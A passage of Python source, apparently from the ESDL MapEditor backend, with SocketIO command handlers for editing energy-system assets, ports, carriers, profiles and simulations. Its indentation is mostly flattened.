storage_info_list.append(asset_info)
if isinstance(asset, esdl.Conversion):
if not strategy_info:
logger.debug("================== NO CONTROL STRATEGY ===================")
conversion_info_list.append(asset_info)
# Sort arrays on asset_type
# attrs_sorted = sorted(attributes, key=lambda a: a['name'])
producer_info_list = sorted(producer_info_list, key=lambda a: (a['type'], a['name']))
consumer_info_list = sorted(consumer_info_list, key=lambda a: (a['type'], a['name']))
transport_info_list = sorted(transport_info_list, key=lambda a: (a['type'], a['name']))
storage_info_list = sorted(storage_info_list, key=lambda a: (a['type'], a['name']))
conversion_info_list = sorted(conversion_info_list, key=lambda a: (a['type'], a['name']))
emit('table_editor', {
'producer': producer_info_list,
'consumer': consumer_info_list,
'transport': transport_info_list,
'storage': storage_info_list,
'conversion': conversion_info_list
})
if message['cmd'] == 'set_asset_param':
if 'id' not in message or message['id'] is None:
fragment = message['fragment']
asset_id = None
else:
fragment = None
asset_id = message['id']
param_name = message['param_name']
param_value = message['param_value']
if asset_id is None:
resource = esh.get_resource(active_es_id)
assets = [resource.resolve(fragment)]
else:
if isinstance(asset_id, list):
assets = []
for ass_id in asset_id:
assets.append(esh.get_by_id(active_es_id, ass_id))
else:
assets = [esh.get_by_id(active_es_id, asset_id)]
for asset in assets:
logger.debug('Set param '+ param_name + ' for class ' + asset.eClass.name + ' to value '+ str(param_value))
try:
attribute = asset.eClass.findEStructuralFeature(param_name)
if attribute is not None:
if attribute.many:
#length = len(param_value)
eCollection = asset.eGet(param_name)
eCollection.clear() # TODO no support for multi-select of enums
print('after clear', eCollection)
if not isinstance(param_value, list):
param_value = [param_value]
for item in param_value:
parsed_value = attribute.eType.from_string(item)
eCollection.append(parsed_value)
else:
if param_value == "" or param_value is None:
parsed_value = attribute.eType.default_value
else:
parsed_value = attribute.eType.from_string(param_value)
if attribute.name == 'id':
esh.remove_object_from_dict(active_es_id, asset)
asset.eSet(param_name, parsed_value)
esh.add_object_to_dict(active_es_id, asset)
else:
asset.eSet(param_name, parsed_value)
else:
send_alert('Error setting attribute {} of {} to {}, unknown attribute'.format(param_name, asset.name, param_value))
except Exception as e:
logger.error('Error setting attribute {} of {} to {}, caused by {}'.format(param_name, asset.name, param_value, str(e)))
send_alert('Error setting attribute {} of {} to {}, caused by {}'.format(param_name, asset.name, param_value, str(e)))
traceback.print_exc()
            # update gui, only if necessary: for EnergyAssets, Ports and the EnergySystem
# update_gui = False
# update_asset = asset
# if isinstance(asset, esdl.EnergySystem):
# #emit()
# # todo find out how to update energy system name and update Area name in dropdown
# pass
# elif isinstance(asset, esdl.EnergyAsset):
# if param_name == esdl.EnergyAsset.name.name:
# update_gui = True
# if param_name == esdl.EnergyAsset.state.name:
# update_gui = True
# elif isinstance(asset, esdl.Port):
# update_gui = True
# update_asset = asset.energyasset
#
# if update_gui:
# emit('delete_esdl_object', {'asset_id': update_asset.id})
# asset_ui, conn_list = energy_asset_to_ui(esh, active_es_id, update_asset)
# emit("add_esdl_objects",
# {
# "es_id": active_es_id,
# "asset_pot_list": [asset_ui],
# "zoom": False,
# })
# emit("add_connections",{"es_id": active_es_id, "conn_list": conn_list})
if message['cmd'] == 'set_area_bld_polygon':
area_bld_id = message['area_bld_id']
polygon_data = message['polygon']
polygon = esdl.Polygon()
exterior = esdl.SubPolygon()
polygon.exterior = exterior
i = 0
prev_lat = 0
prev_lng = 0
while i < len(polygon_data[0]):
coord = polygon_data[0][i]
if i == 0:
first = (coord['lat'], coord['lng'])
if i == len(polygon_data) - 1:
last = (coord['lat'], coord['lng'])
# Don't understand why, but sometimes coordinates come in twice
if prev_lat != coord['lat'] or prev_lng != coord['lng']:
point = esdl.Point(lat=coord['lat'], lon=coord['lng'])
exterior.point.append(point)
prev_lat = coord['lat']
prev_lng = coord['lng']
i += 1
area = es_edit.instance[0].area
area_selected = ESDLEnergySystem.find_area(area, area_bld_id)
if area_selected:
area_selected.geometry = polygon
else:
bld_selected = ESDLAsset.find_asset(area, area_bld_id)
if bld_selected:
bld_selected.geometry = polygon
else:
                send_alert('SERIOUS ERROR: set_area_bld_polygon - cannot find area or building')
if message['cmd'] == 'split_conductor':
cond_id = message['id']
mode = message['mode'] # connect, add_joint, no_connect
location_to_split = message['location']
area = es_edit.instance[0].area
conductor, container = ESDLAsset.find_asset_and_container(area, cond_id)
split_conductor(conductor, location_to_split, mode, container)
if message['cmd'] == 'get_port_profile_info':
port_id = message['port_id']
asset = get_asset_from_port_id(esh, active_es_id, port_id)
if asset:
ports = asset.port
for p in ports:
if p.id == port_id:
profile = p.profile
if profile:
profile_info_list = generate_profile_info(profile)
emit('port_profile_info', {'port_id': port_id, 'profile_info': profile_info_list})
else:
emit('port_profile_info', {'port_id': port_id, 'profile_info': []})
if message['cmd'] == 'add_profile_to_port':
port_id = message['port_id']
profile_class = message['profile_class']
quap_type = message["qaup_type"]
if profile_class == 'SingleValue':
value = message['value']
esdl_profile = esdl.SingleValue()
esdl_profile.value = str2float(value)
elif profile_class == 'DateTimeProfile':
esdl_profile = esdl.DateTimeProfile()
# TODO: Determine how to deal with DateTimeProfiles in the UI
else:
# Assume all other options are InfluxDBProfiles
multiplier = message['multiplier']
profiles = Profiles.get_instance().get_profiles()['profiles']
for pkey in profiles:
p = profiles[pkey]
if p['profile_uiname'] == profile_class:
esdl_profile = esdl.InfluxDBProfile()
esdl_profile.multiplier = str2float(multiplier)
esdl_profile.measurement = p['measurement']
esdl_profile.field = p['field']
if 'host' in p and p['host']:
esdl_profile.host = p['host']
if 'port' in p and p['port']:
esdl_profile.port = int(p['port'])
else:
esdl_profile.host = settings.profile_database_config['protocol'] + "://" + \
settings.profile_database_config['host']
esdl_profile.port = int(settings.profile_database_config['port'])
esdl_profile.database = p['database']
esdl_profile.filters = settings.profile_database_config['filters']
if 'start_datetime' in p:
dt = parse_date(p['start_datetime'])
if dt:
esdl_profile.startDate = EDate.from_string(str(dt))
else:
send_alert('Invalid datetime format')
if 'end_datetime' in p:
dt = parse_date(p['end_datetime'])
if dt:
esdl_profile.endDate = EDate.from_string(str(dt))
else:
send_alert('Invalid datetime format')
if quap_type == 'predefined_qau':
# socket.emit('command', {cmd: 'add_profile_to_port', port_id: port_id, value: profile_mult_value,
# profile_class: profile_class, quap_type: qaup_type, predefined_qau: predefined_qau});
predefined_qau = message["predefined_qau"]
for pqau in esdl_config.esdl_config['predefined_quantity_and_units']:
if pqau['id'] == predefined_qau:
try:
# check if predefined qau is already present in the ESDL
qau = esh.get_by_id(active_es_id, predefined_qau)
except KeyError:
qau = ESDLQuantityAndUnits.build_qau_from_dict(pqau)
esi_qau = ESDLQuantityAndUnits.get_or_create_esi_qau(esh, active_es_id)
esi_qau.quantityAndUnit.append(qau)
esh.add_object_to_dict(active_es_id, qau)
                    #qau.id = str(uuid.uuid4())  # generate new id for predefined qau otherwise double ids appear
break
# make a reference instead of a direct link
qau_ref = esdl.QuantityAndUnitReference(reference=qau)
esdl_profile.profileQuantityAndUnit = qau_ref
elif quap_type == 'custom_qau':
# socket.emit('command', {cmd: 'add_profile_to_port', port_id: port_id, value: profile_mult_value,
# profile_class: profile_class, quap_type: qaup_type, custom_qau: custom_qau});
custom_qau = message["custom_qau"]
qau = ESDLQuantityAndUnits.build_qau_from_dict(custom_qau)
esdl_profile.profileQuantityAndUnit = qau
elif quap_type == 'profiletype':
# socket.emit('command', {cmd: 'add_profile_to_port', port_id: port_id, value: profile_mult_value,
# profile_class: profile_class, quap_type: qaup_type, profile_type: profile_type});
profile_type = message['profile_type']
esdl_profile.profileType = esdl.ProfileTypeEnum.from_string(profile_type)
esdl_profile.id = str(uuid.uuid4())
esh.add_object_to_dict(es_edit.id, esdl_profile)
asset = get_asset_from_port_id(esh, active_es_id, port_id)
if asset:
ports = asset.port
for p in ports:
if p.id == port_id:
# p.profile = esdl_profile
ESDLAsset.add_profile_to_port(p, esdl_profile)
if message['cmd'] == 'remove_profile_from_port':
port_id = message['port_id']
profile_id = message['profile_id']
asset = get_asset_from_port_id(esh, active_es_id, port_id)
if asset:
ports = asset.port
for p in ports:
if p.id == port_id:
# p.profile = esdl_profile
ESDLAsset.remove_profile_from_port(p, profile_id)
if message['cmd'] == 'add_port' or message['cmd'] == 'add_port_with_id':
        # merge add_port and add_port_with_id. Why on earth were there two messages for the same thing?
        # TODO: the frontend should be adapted to only send one of these
        # ptype and direction do the same thing!
asset_id = message['asset_id']
pname = message['pname']
pid = str(uuid.uuid4())
if 'pid' in message:
pid = message['pid']
if 'ptype' in message:
ptype = message['ptype']
if 'direction' in message:
direction = message['direction']
ptype = 'InPort' if direction == 'in' else 'OutPort'
asset = esh.get_by_id(es_edit.id, asset_id)
if ptype == 'InPort':
port = esdl.InPort(id=pid, name=pname)
else:
port = esdl.OutPort(id=pid, name=pname)
geom = asset.geometry
if len(asset.port) >= 6:
send_alert('ERROR: MapEditor cannot visualize assets with more than 6 ports.')
if isinstance(geom, esdl.Line) and len(asset.port) >= 2:
send_alert('ERROR: Line geometries cannot have more than two ports.')
elif isinstance(geom, esdl.Line) and len(asset.port) == 1 and asset.port[0].eClass.name == ptype:
send_alert('ERROR: Line cannot have ports of the same type.')
else:
if isinstance(geom, esdl.Line) and isinstance(port, esdl.InPort):
asset.port.insert(0, port) # insert InPort always at beginning as this is the convention
else:
asset.port.append(port)
esh.add_object_to_dict(active_es_id, port)
port_list = []
for p in asset.port:
port_list.append(
                {'name': p.name, 'id': p.id, 'type': type(p).__name__, 'conn_to': [pt.id for pt in p.connectedTo]})
emit('update_asset', {'asset_id': asset.id, 'ports': port_list})
if message['cmd'] == 'remove_port':
pid = message['port_id']
asset = get_asset_from_port_id(esh, active_es_id, pid)
ports = asset.port
port_list = []
for p in set(ports):
if p.id == pid:
esh.remove_object_from_dict(active_es_id, p, recursive=True)
ports.remove(p) # remove from list
p.delete() # delete from esdl (e.g. if other ports refer to this port, they will be updated)
# question is why is this necessary in pyecore and isn't this done automatically
# as p is not contained anymore and you get dangling references.
else:
carrier_id = p.carrier.id if p.carrier else None
port_list.append({'name': p.name, 'id': p.id, 'type': type(p).__name__, 'conn_to': [pt.id for pt in p.connectedTo], 'carrier': carrier_id})
emit('update_asset', {'asset_id': asset.id, 'ports': port_list})
if message['cmd'] == 'remove_connection_portids':
from_port_id = message['from_port_id']
from_port = esh.get_by_id(es_edit.id, from_port_id)
to_port_id = message['to_port_id']
to_port = esh.get_by_id(es_edit.id, to_port_id)
from_port.connectedTo.remove(to_port)
from_asset_id = from_port.eContainer().id
to_asset_id = to_port.eContainer().id
# refresh connections in gui
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
new_list = []
#print(conn_list)
for conn in conn_list:
if (conn['from-port-id'] != from_port_id or conn['from-asset-id'] != from_asset_id or
conn['to-port-id'] != to_port_id or conn['to-asset-id'] != to_asset_id) and \
(conn['from-port-id'] != to_port_id or conn['from-asset-id'] != to_asset_id or
conn['to-port-id'] != from_port_id or conn['to-asset-id'] != from_asset_id):
# Remove both directions from -> to and to -> from as we don't know how they are stored in the list
# does not matter, as a connection is unique
new_list.append(conn) # add connections that we are not interested in
else:
print(' - removed {}'.format(conn))
set_session_for_esid(active_es_id, 'conn_list', new_list) # set new connection list
# TODO: send es.id with this message?
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': new_list})
if message['cmd'] == 'remove_connection':
# socket.emit('command', {cmd: 'remove_connection', from_asset_id: from_asset_id, from_port_id: from_port_id,
# to_asset_id: to_asset_id, to_port_id: to_port_id});
from_asset_id = message['from_asset_id']
from_port_id = message['from_port_id']
from_port = esh.get_by_id(es_edit.id, from_port_id)
to_asset_id = message['to_asset_id']
to_port_id = message['to_port_id']
to_port = esh.get_by_id(es_edit.id, to_port_id)
from_port.connectedTo.remove(to_port)
# refresh connections in gui
active_es_id = get_session('active_es_id')
conn_list = get_session_for_esid(active_es_id, 'conn_list')
new_list = []
#print(conn_list)
for conn in conn_list:
if (conn['from-port-id'] != from_port_id or conn['from-asset-id'] != from_asset_id or \
conn['to-port-id'] != to_port_id or conn['to-asset-id'] != to_asset_id) and \
(conn['from-port-id'] != to_port_id or conn['from-asset-id'] != to_asset_id or \
conn['to-port-id'] != from_port_id or conn['to-asset-id'] != from_asset_id):
# Remove both directions from -> to and to -> from as we don't know how they are stored in the list
# does not matter, as a connection is unique
new_list.append(conn) # add connections that we are not interested in
else:
print(' - removed {}'.format(conn))
set_session_for_esid(active_es_id, 'conn_list', new_list) # set new connection list
# TODO: send es.id with this message?
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': new_list})
if message['cmd'] == 'set_carrier':
asset_id = message['asset_id']
carrier_id = message['carrier_id']
area = es_edit.instance[0].area
if asset_id:
asset = ESDLAsset.find_asset(area, asset_id)
num_ports = len(asset.port)
if isinstance(asset, esdl.Transport) or num_ports == 1:
set_carrier_for_connected_transport_assets(asset_id, carrier_id)
else:
send_alert("Error: Can only start setting carriers from transport assets or assets with only one port")
update_carrier_conn_list()
if message['cmd'] == 'add_carrier':
# en_carr: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, emission: carr_emission, encont: carr_encont, encunit: carr_encunit});
# el_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, voltage: carr_voltage});
# g_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, pressure: carr_pressure});
# h_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name, suptemp: carr_suptemp, rettemp: carr_rettemp});
# en_comm: socket.emit('command', {cmd: 'add_carrier', type: carr_type, name: carr_name});
carr_type = message['type']
carr_name = message['name']
carr_id = str(uuid.uuid4())
if carr_type == 'en_carr':
carr_emission = message['emission']
carr_encont = message['encont']
carr_encunit = message['encunit'] # MJpkg MJpNm3 MJpMJ
carr_sofm = message['sofm']
carr_rentype = message['rentype']
carrier = esdl.EnergyCarrier(id = carr_id, name = carr_name, emission = str2float(carr_emission),
energyContent = str2float(carr_encont), energyCarrierType = carr_rentype, stateOfMatter = carr_sofm)
if carr_encunit == 'MJpkg':
encont_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.ENERGY,
multiplier=esdl.MultiplierEnum.MEGA,
unit=esdl.UnitEnum.JOULE,
perMultiplier=esdl.MultiplierEnum.KILO,
perUnit=esdl.UnitEnum.GRAM)
elif carr_encunit == 'MJpNm3':
encont_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.ENERGY,
multiplier=esdl.MultiplierEnum.MEGA,
unit=esdl.UnitEnum.JOULE,
perUnit=esdl.UnitEnum.CUBIC_METRE)
elif carr_encunit == 'MJpMJ':
encont_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.ENERGY,
multiplier=esdl.MultiplierEnum.MEGA,
unit=esdl.UnitEnum.JOULE,
perMultiplier=esdl.MultiplierEnum.MEGA,
perUnit=esdl.UnitEnum.JOULE)
emission_qandu=esdl.QuantityAndUnitType(
physicalQuantity=esdl.PhysicalQuantityEnum.EMISSION,
multiplier=esdl.MultiplierEnum.KILO,
unit=esdl.UnitEnum.GRAM,
perMultiplier=esdl.MultiplierEnum.GIGA,
perUnit=esdl.UnitEnum.JOULE)
carrier.energyContentUnit = encont_qandu
carrier.emissionUnit = emission_qandu
if carr_type == 'el_comm':
carr_voltage = message['voltage']
carrier = esdl.ElectricityCommodity(id=carr_id, name=carr_name, voltage=str2float(carr_voltage))
if carr_type == 'g_comm':
carr_pressure = message['pressure']
carrier = esdl.GasCommodity(id=carr_id, name=carr_name, pressure=str2float(carr_pressure))
if carr_type == 'h_comm':
carr_suptemp = message['suptemp']
carr_rettemp = message['rettemp']
carrier = esdl.HeatCommodity(id=carr_id, name=carr_name, supplyTemperature=str2float(carr_suptemp), returnTemperature=str2float(carr_rettemp))
if carr_type == 'en_comm':
carrier = esdl.EnergyCarrier(id=carr_id, name=carr_name)
esh.add_object_to_dict(es_edit.id, carrier) # add carrier to ID list for easy retrieval
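# make sure the EnergySystemInformation and Carriers containers exist before appending the new carrier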
esi = es_edit.energySystemInformation
if not esi:
esi_id = str(uuid.uuid4())
esi = esdl.EnergySystemInformation()
esi.id = esi_id
es_edit.energySystemInformation = esi
esh.add_object_to_dict(es_edit.id, esi)
ecs = esi.carriers
if not ecs:
ecs_id = str(uuid.uuid4())
ecs = esdl.Carriers(id=ecs_id)
esi.carriers = ecs
esh.add_object_to_dict(es_edit.id, ecs)
ecs.carrier.append(carrier)
carrier_list = ESDLEnergySystem.get_carrier_list(es_edit)
emit('carrier_list', {'es_id': es_edit.id, 'carrier_list': carrier_list})
return True
if message['cmd'] == 'remove_carrier':
carrier_id = message['carrier_id']
carrier = esh.get_by_id(es_edit.id, carrier_id)
carrier.delete()
conn_list = get_session_for_esid(es_edit.id, 'conn_list')
for c in conn_list:
if c['from-port-carrier'] == carrier_id:
c['from-port-carrier'] = None
if c['to-port-carrier'] == carrier_id:
c['to-port-carrier'] = None
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': es_edit.id, 'conn_list': conn_list})
if message['cmd'] == 'get_storage_strategy_info':
asset_id = message['asset_id']
mcc, mdc = get_storage_marginal_costs(asset_id)
emit('storage_strategy_window', {'asset_id': asset_id, 'mcc': mcc, 'mdc': mdc})
if message['cmd'] == 'get_curtailment_strategy_info':
asset_id = message['asset_id']
max_power = get_curtailment_max_power(asset_id)
emit('curtailment_strategy_window', {'asset_id': asset_id, 'max_power': max_power})
if message['cmd'] == 'set_control_strategy':
# socket.emit('command', {'cmd': 'set_control_strategy', 'strategy': control_strategy, 'asset_id': asset_id, 'port_id': port_id});
strategy = message['strategy']
asset_id = message['asset_id']
if strategy == 'StorageStrategy':
mcc = message['marg_ch_costs']
mdc = message['marg_disch_costs']
add_storage_control_strategy_for_asset(asset_id, mcc, mdc)
elif strategy == 'CurtailmentStrategy':
max_power = message['max_power']
add_curtailment_control_strategy_for_asset(asset_id, max_power)
else:
port_id = message['port_id']
add_drivenby_control_strategy_for_asset(asset_id, strategy, port_id)
if message['cmd'] == 'remove_control_strategy':
asset_id = message['asset_id']
remove_control_strategy_for_asset(asset_id)
if message['cmd'] == 'set_marginal_costs_get_info':
asset_id = message['asset_id']
mc = get_marginal_costs_for_asset(asset_id)
emit('marginal_costs', {'asset_id': asset_id, 'mc': mc})
if message['cmd'] == 'set_marg_costs':
asset_id = message['asset_id']
mc = str2float(message['marg_costs'])
set_marginal_costs_for_asset(asset_id, mc)
if message['cmd'] == 'layer':
pass
if message['cmd'] == 'run_ESSIM_simulation':
logger.debug('ESSIM simulation command received')
sim_descr = message['sim_description']
sim_start_datetime = message['sim_start_datetime']
sim_end_datetime = message['sim_end_datetime']
essim_kpis = message['essim_kpis']
essim_loadflow = message['essim_loadflow']
# Create the HTTP POST to start the simulation
if not essim.run_simulation(sim_descr, sim_start_datetime, sim_end_datetime, essim_kpis, essim_loadflow):
emit('simulation_not_started')
if message['cmd'] == 'validate_for_ESSIM':
logger.debug('validation for ESSIM command received')
res = validate_ESSIM(es_edit)
emit('results_validation_for_ESSIM', res)
# if message['cmd'] == 'calculate_ESSIM_KPIs':
# session['simulationRun'] = '5d10f273783bac5eff4575e8'
# ESSIM_config = settings.essim_config
#
# simulation_run = get_session('simulationRun')
# if simulation_run:
#
# active_simulation = get_session('active_simulation')
# if active_simulation:
# sdt = datetime.strptime(active_simulation['startDate'], '%Y-%m-%dT%H:%M:%S%z')
# edt = datetime.strptime(active_simulation['endDate'], '%Y-%m-%dT%H:%M:%S%z')
# else:
# send_alert('No active_simulation! This should not happen, please report. However, you can continue')
# sdt = datetime.strptime(ESSIM_config['start_datetime'], '%Y-%m-%dT%H:%M:%S%z')
# edt = datetime.strptime(ESSIM_config['end_datetime'], '%Y-%m-%dT%H:%M:%S%z')
#
# influxdb_startdate = sdt.strftime('%Y-%m-%dT%H:%M:%SZ')
# influxdb_enddate = edt.strftime('%Y-%m-%dT%H:%M:%SZ')
#
# calc_ESSIM_KPIs.submit(es_edit, simulation_run, influxdb_startdate, influxdb_enddate)
# else:
# send_alert('No simulation id defined - run an ESSIM simulation first')
if message['cmd'] == 'add_layer':
id = message['id']
descr = message['descr']
url = message['url']
name = message['name']
setting_type = message['setting_type']
project_name = message['project_name']
legend_url = message['legend_url']
visible = message['visible']
layer = {
"description": descr,
"url": url,
"layer_name": name,
"setting_type": setting_type,
"project_name": project_name,
"legend_url": legend_url,
"layer_ref": None,
"visible": visible
}
wms_layers.add_wms_layer(id, layer)
if message['cmd'] == 'remove_layer':
id = message['id']
wms_layers.remove_wms_layer(id)
if message['cmd'] == 'get_es_info':
attributes = [
{"id": 1, "name": "Energysystem name", "value": es_edit.name},
{"id": 2, "name": "Energysystem description", "value": es_edit.description}
]
emit('show_es_info', attributes)
if message['cmd'] == 'set_es_info_param':
id = message['id']
value = message['value']
if id == "1":
es_edit.name = value
if id == "2":
es_edit.description = value
if message['cmd'] == 'add_sector':
name = message['name']
descr = message['descr']
code = message['code']
ESDLEnergySystem.add_sector(es_edit, name, code, descr)
sector_list = ESDLEnergySystem.get_sector_list(es_edit)
emit('sector_list', {'es_id': es_edit.id, 'sector_list': sector_list})
if message['cmd'] == 'remove_sector':
id = message['id']
esh = get_handler()
ESDLEnergySystem.remove_sector(es_edit, id)
sector_list = ESDLEnergySystem.get_sector_list(es_edit)
emit('sector_list', {'es_id': es_edit.id, 'sector_list': sector_list})
if message['cmd'] == 'set_sector':
asset_id = message['asset_id']
sector_id = message['sector_id']
instance = es_edit.instance
area = instance[0].area
asset = ESDLAsset.find_asset(area, asset_id)
esi = es_edit.energySystemInformation
sectors = esi.sectors
sector = sectors.sector
for s in sector:
if s.id == sector_id:
asset.sector = s
if message['cmd'] == 'get_edr_asset':
edr_asset_id = message['edr_asset_id']
edr_asset_str = edr_assets.get_asset_from_EDR(edr_asset_id)
if edr_asset_str:
edr_asset = ESDLAsset.load_asset_from_string(edr_asset_str)
edr_asset_name = edr_asset.name
edr_asset_type = type(edr_asset).__name__
edr_asset_cap = get_asset_capability_type(edr_asset)
emit('place_edr_asset', edr_asset_type)
set_session('adding_edr_assets', edr_asset_str)
recently_used_edr_assets = get_session('recently_used_edr_assets')
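# keep a most-recently-used list of at most 5 EDR assets, newest first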
if recently_used_edr_assets:
current_edr_asset_in_list = False
for edra in recently_used_edr_assets:
if edra['edr_asset_id'] == edr_asset_id:
current_edr_asset_in_list = True
if not current_edr_asset_in_list and len(recently_used_edr_assets) == 5:
recently_used_edr_assets.pop() # Remove last element
if not current_edr_asset_in_list:
recently_used_edr_assets.insert(0, {
'edr_asset_id': edr_asset_id,
'edr_asset_name': edr_asset_name,
'edr_asset_type': edr_asset_type,
'edr_asset_cap': edr_asset_cap,
'edr_asset_str': edr_asset_str
})
else:
recently_used_edr_assets = list()
recently_used_edr_assets.append({
'edr_asset_id': edr_asset_id,
'edr_asset_name': edr_asset_name,
'edr_asset_type': edr_asset_type,
'edr_asset_cap': edr_asset_cap,
'edr_asset_str': edr_asset_str
})
set_session('recently_used_edr_assets', recently_used_edr_assets)
emit('recently_used_edr_assets', recently_used_edr_assets)
else:
send_alert('Error getting ESDL model from EDR')
if message['cmd'] == 'set_asset_drawing_mode':
mode = message['mode']
set_session('asset_drawing_mode', mode)
if mode == 'empty_assets':
set_session('adding_edr_assets', None)
set_session('asset_from_measure_id', None)
if mode == 'edr_asset':
edr_asset_info = message['edr_asset_info']
# If an asset is selected from the EDR directly, its ESDL string is cached.
# AssetDrawToolbar EDR assets stored in mongo do not have the ESDL string stored.
if 'edr_asset_str' not in edr_asset_info:
edr_asset_id = edr_asset_info['edr_asset_id']
edr_asset_info['edr_asset_str'] = edr_assets.get_asset_from_EDR(edr_asset_id)
set_session('adding_edr_assets', edr_asset_info['edr_asset_str'])
if mode == 'asset_from_measures':
asset_from_measure_id = message['asset_from_measure_id']
set_session('asset_from_measure_id', asset_from_measure_id)
if message['cmd'] == 'query_esdl_service':
params = message['params']
logger.debug("received query_esdl_service command with params: {}".format(params))
query_esdl_services.submit(params)
if message['cmd'] == 'redraw_connections': # set_carrier_color
# this is called when a carrier color is changed and the gui needs to be refreshed
# ideally this would be handled entirely in the front end (no changes to the ESDL model),
# but the front end does not yet have enough information to do so.
conn_list = get_session_for_esid(active_es_id, 'conn_list')
emit('clear_connections') # clear current active layer connections
emit('add_connections', {'es_id': active_es_id, 'conn_list': conn_list})
asset_list = get_session_for_esid(active_es_id, 'asset_list')
emit('clear_ui', {'layer': 'assets'}) # clear current active layer assets
emit('add_esdl_objects', {'es_id': active_es_id, 'asset_pot_list': asset_list, 'zoom': False})
if message['cmd'] == 'building_editor':
bld_id = message['id']
building = esh.get_by_id(active_es_id, bld_id)
bld_info = get_building_information(building)
emit('building_information', bld_info)
emit('add_esdl_objects',
{'es_id': active_es_id, 'add_to_building': True, 'asset_pot_list': bld_info["asset_list"],
'zoom': False})
emit('add_connections', {'es_id': active_es_id, 'add_to_building': True, 'conn_list': bld_info["conn_list"]})
if message['cmd'] == 'accept_received_esdl':
user_email = get_session('user-email')
received_esdls = esdl_api.get_esdl_for_user(user_email)
if received_esdls:
for received_esdl in received_esdls:
filename = 'ESDL from '+received_esdl['sender']
esh = get_handler()
try:
result, parse_info = esh.add_from_string(name=filename, esdl_string=urllib.parse.unquote(received_esdl['esdl']))
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(filename, info))
call_process_energy_system.submit(esh, filename) # run in separate thread
esdl_api.remove_esdls_for_user(user_email)
except Exception as e:
logger.error("Error loading {}: {}".format(filename, e))
send_alert('Error interpreting ESDL from file - Exception: ' + str(e))
if message['cmd'] == 'rename_energysystem':
name = message['name']
rename_es_id = message['remame_es_id']
es_rename = esh.get_energy_system(es_id=rename_es_id)
es_rename.name = name
if message['cmd'] == 'remove_energysystem':
remove_es_id = message['remove_es_id']
esh.remove_energy_system(es_id=remove_es_id)
if message['cmd'] == 'refresh_esdl':
print('refresh_esdl')
esh = get_handler()
call_process_energy_system.submit(esh, force_update_es_id=es_edit.id, zoom=False) # run in separate thread
set_handler(esh)
session.modified = True
@executor.job
def query_esdl_services(params):
esh = get_handler()
logger.debug('calling service')
try:
esdl_service_ok, esdl_service_result = esdl_services.call_esdl_service(params)
except Exception as exc:
logger.exception("Exception when querying ESDL service")
esdl_service_ok = False
esdl_service_result = str(exc)
logger.debug('emitting result to browser')
if esdl_service_ok:
if esdl_service_result is not None:
emit('esdl_service_result', esdl_service_result)
else:
message = 'Error calling service'
if isinstance(esdl_service_result, str):
message += ': ' + esdl_service_result
send_alert(message)
# logger.debug('processing energy system')
call_process_energy_system.submit(esh)
@socketio.on('set_active_es_id', namespace='/esdl')
def set_active_es_id(id):
set_session('active_es_id', id)
logger.debug("========== Setting active es_id to {} =============".format(id))
# ---------------------------------------------------------------------------------------------------------------------
# React on commands from the browser (add, remove, ...)
# ---------------------------------------------------------------------------------------------------------------------
@socketio.on('file_command', namespace='/esdl')
def process_file_command(message):
logger.info('received: ' + message['cmd'])
es_info_list = get_session("es_info_list")
if message['cmd'] == 'new_esdl':
name = message['name']
description = message['description']
instance_name = message['instance_name']
top_area_name = message['top_area_name']
if name == '': name = 'New Energy System'
if instance_name == '': instance_name = 'Untitled instance'
if top_area_name == '': top_area_name = 'Untitled area'
filename = 'Unknown'
esh = EnergySystemHandler()
es = esh.create_empty_energy_system(name, description, instance_name, top_area_name, esdlVersion=esdl_doc.get_esdl_version())
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, filename)
del_session('store_item_metadata')
emit('store_item_metadata', {})
set_session('active_es_id', es.id)
set_session('es_filename', filename)
if message['cmd'] == 'load_esdl_from_file':
file_content = message['file_content']
filename = message['filename']
esh = EnergySystemHandler()
try:
result, parse_info = esh.load_from_string(esdl_string=file_content, name=filename)
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(filename, info))
except Exception as e:
logger.exception(f"Error opening {filename}")
send_alert("Error opening {}. Exception is: {}".format(filename, e))
emit('clear_ui')
return
es = esh.get_energy_system()
set_handler(esh)
es_info_list = {}
set_session("es_info_list", es_info_list)
emit('clear_ui')
emit('clear_esdl_layer_list')
call_process_energy_system.submit(esh, filename) # run in separate thread
#thread = threading.Thread(target=process_energy_system, args=(esh, None, None, current_app._get_current_object() ))
#thread.start()
del_session('store_item_metadata')
emit('store_item_metadata', {})
set_session('active_es_id', es.id)
set_session('es_filename', filename)
if message['cmd'] == 'import_esdl_from_file':
file_content = message['file_content']
filename = message['filename']
esh = get_handler()
try:
imported_es, parse_info = esh.add_from_string(name=filename, esdl_string=file_content)
if len(parse_info) > 0:
info = ''
for line in parse_info:
info += line + "\n"
send_alert("Warnings while opening {}:\n\n{}".format(filename, info))
call_process_energy_system.submit(esh, filename) # run in separate thread
set_session('active_es_id', imported_es.id)
set_session('es_filename', filename)
except Exception as e:
logger.error("Error loading {}: {}".format(filename, e))
send_alert('Error interpreting ESDL from file - Exception: ' + str(e))
if message['cmd'] == 'get_list_from_store':
role = get_session('user-role')
if 'mondaine' in role:
store_url = mondaine_hub_url + 'tagged?tag=map&take=1000'
else:
store_url = default_store_url+ 'tagged?tag=map&take=1000'
try:
result = requests.get(store_url)
except Exception as e:
logger.error('Error accessing ESDL store: ' + str(e))
send_alert('Error accessing ESDL store: ' + str(e))
return
data = result.json()
store_list = []
for store_item in data:
store_list.append({'id': store_item['id'], 'title': store_item['title']})
